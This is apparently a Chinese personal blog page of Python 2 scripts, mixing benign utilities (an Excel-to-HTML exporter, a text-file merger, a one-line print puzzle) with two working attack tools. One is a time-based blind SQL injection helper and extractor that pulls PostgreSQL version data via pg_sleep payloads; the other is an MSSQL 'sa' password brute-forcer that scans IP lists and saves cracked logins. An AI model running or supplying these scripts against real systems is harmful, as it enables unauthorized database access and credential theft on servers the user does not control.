分类 python 下的文章

手工注入辅助脚本

注入命令构造辅助脚本

此脚本栗子用为延时注入的构造,相对于 HACKBAR 就不需要用鼠标去点 EXECUTE 了. 能提升不少效率

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *  # 页面分析用
import sys
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--"
    payload = "';select%20pg_sleep(3) where 1=1 and "
    while 1:
        com = raw_input("com: ")
        if com != 'exit':
            t = payload + com + ';--'
            print 'payload: '+t
            docsGroup = URLConnect(t)
            # soup = BeautifulSoup(docsGroup.content,from_encoding='utf8')
            # print soup.get_text()
            print docsGroup.elapsed
            print '\n'
        else:
            exit()

if __name__ == '__main__':
    main()

使用效果
构造脚本使用效果

手工注入爆破辅助脚本

用以爆破字段之类的

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *
import sys
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--" # 取版本号
    #payload = "';select%20pg_sleep(3) where 1=1 and length(version()) = 103;--" # 取版本号长度
    #payload = "';select%20pg_sleep(3) where 1=1 and left(version(),1) = chr(80);--" # 猜解字符
    strs = ""
    i = 0
    while i < 103:  # 已知数据长度
        t = 0
        while t < 128:  # 猜解对应字符串
            payload = "';select%20pg_sleep(2) where 1=1 and substr(version(),"+str(i+1)+",1) = chr("+str(t)+");--"
            #print payload
            docsGroup = URLConnect(payload)
            timec = docsGroup.elapsed #0:00:03.093413
            timec = str(timec)[5:7]
            if timec == "02":
                strs = strs + chr(t)
                print strs
                break
            t = t + 1
        i = i + 1

if __name__ == '__main__':
    main()

使用效果
爆破脚本使用效果

[python] excel 文档解析导出 html

因为 excel 默认情况下对于长文本显示不太友好.
提取第一行的内容作为 key, 将余下的内容分别对应到每一列的 key 然后导出为 html 的表格.

效果图如下:
效果图
代码如下:

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# author: help@sys7em.info
# desript: excel 文档解析, 生成友好的需求文件
import os,sys;
import xlrd;
import time,re;
reload(sys)
sys.setdefaultencoding('utf-8')

def saveFile(i,file = False,Data = False):
    if file == False or Data == False:
        print '[!] Error: file or data is not found'
        sys.exit(0)
    path = os.path.splitext(file)[0]
    path = path + '-' +i.encode('gb2312')
    path = path + time.strftime(".%Y.%m.%d.%H.%M.%S.html", time.localtime())
    try:
        file = open(path,"w+")
    except Exception,e:
        print '[!] Error'
        print e;
    file.write('<html><head><meta charset="GB2312"></head><body bgcolor="#f4f4f4"><center><div><table width="860" border="3" style="background-color:#fff" bordercolor="#336699" cellspacing="3" cellpadding="10" align="CENTER"><thead><tr><th>'+i.encode('gb2312')+'</th></tr></thead><tbody>');
    for i in xrange(0,len(Data)):
        rowData = Data[i];
        file.write('<tr><td><table cellpadding="5">');
        for j  in rowData.items():
            key = j[0]
            value = j[1]
            file.write('<tr><td width="15%">'+key+':</td>')
            value = re.sub(re.compile(u"\r\n"),'<br>',str(value))
            file.write('<td width="85%" style="word-wrap:break-word;word-break:break-all;">'+str(value)+'</td></tr>')
        file.write("</table></tr></td>");
    file.close();
    print '[+] Exported => '+path;
    
def export(file = False,count = False):
    if file == False or count == False:
        print '[!] Error: args is Fail'
        sys.exit(0)
    try:
        data = xlrd.open_workbook(file)
    except Exception,e:
        print '[!] Error'
        print str(e);
        sys.exit(0)
    for i in data.sheet_names():
        print '[+] ==== '+i+'===='
        localData = data.sheet_by_name(i);
        print '[+] rows => '+str(localData.nrows)
        print '[+] cols => '+str(localData.ncols)
        print '[+] count => '+str(count)
        # get dist
        dist = []
        for col in xrange(0,localData.ncols):
            tmp = localData.cell(count-1,col).value
            tmp = str(tmp)
            dist.append(tmp.encode('gb2312'))
        # save data
        rowData = [];
        for row in xrange(count,localData.nrows):
            currData = {};
            for col in xrange(0,localData.ncols):
                key = dist[col]
                try:
                    currData[key] = localData.cell(row,col).value.encode('gb2312');  # a["dist"] = "value"
                except Exception,e:
                    currData[key] = localData.cell(row,col).value;  # a["dist"] = "value"
            rowData.append(currData) # b["row"] = {"aa":"value"}
        saveFile(i,file,rowData);
def init(fileName,count):
    localDir = os.getcwd();
    targetFile = localDir+"\\"+fileName;
    print '[+] Check File...'
    if os.path.isfile(targetFile) != True:
        print '[!] Error: is no file', targetFile
        sys.exit();
    if "xls" not in os.path.splitext(targetFile)[1]:
        print '[!] Error: is no file'
        sys.exit();
    print '[+] exporting..'
    export(targetFile,int(count))
    print '[+] Done.'
    
def main():
    if len(sys.argv) == 3:
        init(sys.argv[1],1);
    elif len(sys.argv) == 4:
        init(sys.argv[1],sys.argv[2])
    else:
        print 'informationSplit.py'
        print 'Author: help@sys7em.info'
        print 'Descript: Excel 信息提取工具'
        print 'Usage: python split.py <a.xls>(string:file name) [count](int:title row,default: 1)'
        sys.exit()
if __name__ == '__main__':
    main()

一个有趣的 Python 语句

朋友给了一个需求, 要在一条语句内打印出下表

Oa:mmm
Ob:zzz
Oc:kkk
Od:qqq
Oe:lll

最终代码,利用了 Py 的可读 index 和 ASCII 码表组合完成了要求

#!/usr/bin/env python
for index,i in enumerate([12,24,8,13,7]):j=(97+index);print("O"+chr(j)+":"+chr((j+i))*3);

Python 小工具

#/usr/bin/env python
#encoding=utf-8
'''
	Power By A.tm.k
	2015-8-7
	将两个文本合并为一个文本
	a.txt + a1.txt > a.txt
'''
import os,sys

def getdir():
	fils = []
	temps = []
	for x in os.listdir(os.getcwd()):
		temps.append(x);
	for x in temps:
		a = x.split('.');
		if a[-1] == 'txt':
			fils.append(x);
	return fils;
def code(fils):
	for i in fils:
		print i[0:3];
	a = raw_input("Check File Name, Do You Want Continue? (Y)es or (N)o:");
	if (a=='N' or a == 'n'):
		sys.exit();
	if (a == 'Y' or a == 'y'):
		a = len(fils);
		fils.append(str(a));
		for i in range(0,a):
			if (fils[i][0:3] == fils[i+1][0:3]):
				templist = [];
				f = open(fils[i]);
				f1 = open(fils[i+1]);
				tmp = open('temp.txt','a');
				for d in f.readlines():
					if(len(d)>0):
						templist.append(d.strip()+'\n');
				for d in f1.readlines():
					if (len(d)>0):
						templist.append(d.strip()+'\n');
				for k in set(templist):
					tmp.write(k)
				f.close();
				f1.close();
				tmp.close();
				os.remove(fils[i])
				os.remove(fils[i+1])
				os.rename('temp.txt',fils[i+1])
				print "[+]"+fils[i]+"<---->"+fils[i+1]+"=======>"+fils[i+1]+" DONE";

if __name__ == '__main__':
	f = getdir()
	code(f);

文件: total.zip 大小: 811 字节
修改时间: 2015年8月7日, 20:00:55
MD5: EA6C5FFB6F70E87C62D5550C180D9DBF
SHA1: 4117AFCE2299E1E3BC3A82999594D25B84FF4ACC
CRC32: 9DEF9657

1433 爆破脚本

#/use/bin/env python
#encoding=utf-8
'''
	Power By A.tm.k From http://sys7em.info/
	Brute Microsoft SQL Server Script
	Microsoft SQL Server 数据库爆破脚本
'''
from __future__ import division
import sys,time
import _mssql
import socket
reload(sys)
sys.setdefaultencoding('gbk')
def connect(host='127.0.0.1',pwd='123456'):
	try:
		conn = _mssql.connect(server=host,user='sa',password=pwd,database='master');
		conn.close()
		return True;
	except Exception, e:
		return False;
def check(host='127.0.0.1'):
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
	socket.setdefaulttimeout(5);
	try:
		sock.connect((host,1433))
		sock.close();
		return True;
	except Exception, e:
		sock.close();
		return False;
def usage():
	t = 'Power By A.tm.k';
	m = '2015-8-3';
	r = 'Usage: brute.py -l ip.txt pass.txt';
	r1 = 'or: brute.py -i 127.0.0.1 pass.txt';
	i = '-';
	print "*"+i*50+"*";
	print "+"+' '*int(((50-len(t))/2))+t+' '*int(((50-len(t))/2))+' +';
	print "+"+' '*int(((50-len(m))/2))+m+' '*int(((50-len(m))/2))+'+';
	print "="+i*50+"=";
	print "+"+' '*int(((50-len(r))/2))+r+' '*int(((50-len(r))/2))+'+';
	print "+"+' '*int(((50-len(r1))/2))+r1+' '*int(((50-len(r1))/2))+'+';
	print "*"+i*50+"*";
def brute(argv='-i',ip='127.0.0.1',pwd='admin'):
	oklist = []
	ips = []
	if argv == '-i':
		print 'Checking host...'
		if check(host=ip):
			print 'Host Up';
			print 'Start Brute';
			try:
				pwd_list = open(pwd);
			except Exception, e:
				print "Password File Fail";
			for x in pwd_list.readlines():
				if connect(host=ip,pwd=x.strip()):
					print 'Brute Dong: pass is -&gt; '+x
			pwd_list.close()
			print "Stop Brute"
		else:
			print 'Host Down';
			print 'Stop Brute';
	elif argv == '-l':
		try:
			ip_list = open(ip)
		except Exception, e:
			print 'IP LIST Fail';
		try:
			pwd_list = open(pwd);
		except Exception, e:
			print 'Password File Fail'
		print "Checking host..."
		for i in ip_list.readlines():
			if check(host=i):
				ips.append(i.strip())
		for i in set(ips):
			for p in pwd_list.readlines():
				if connect(host=i.strip(),pwd=p.strip()):
					tmp = 'IP: '+i+" : "+p
					oklist.append(tmp)
		ok = open('ok.txt','a')
		for i in oklist:
			ok.write(i)
		ok.close()
		pwd_list.close()
		ip_list.close()
	else:
		print "argv Not Found"
def main():
	if len(sys.argv) &lt;= 3:
		usage();
	elif len(sys.argv) == 4:
		brute(argv=sys.argv[1],ip=sys.argv[2],pwd=sys.argv[3])
	else:
		print "argv overflow"
if __name__ == '__main__':
	main()

brute.zip 需要安装 _mssql 模块 或者使用 pymssql 套结替换代码中的 conn 验证串
文件: brute.py
大小: 2587 字节
修改时间: 2015年8月3日, 22:44:43
MD5: 9C3A0B6148640A66F5CDDA4368289D7F
SHA1: C9350426EACA0D699F1751144E8FA226ACD3027C
CRC32: 165E953D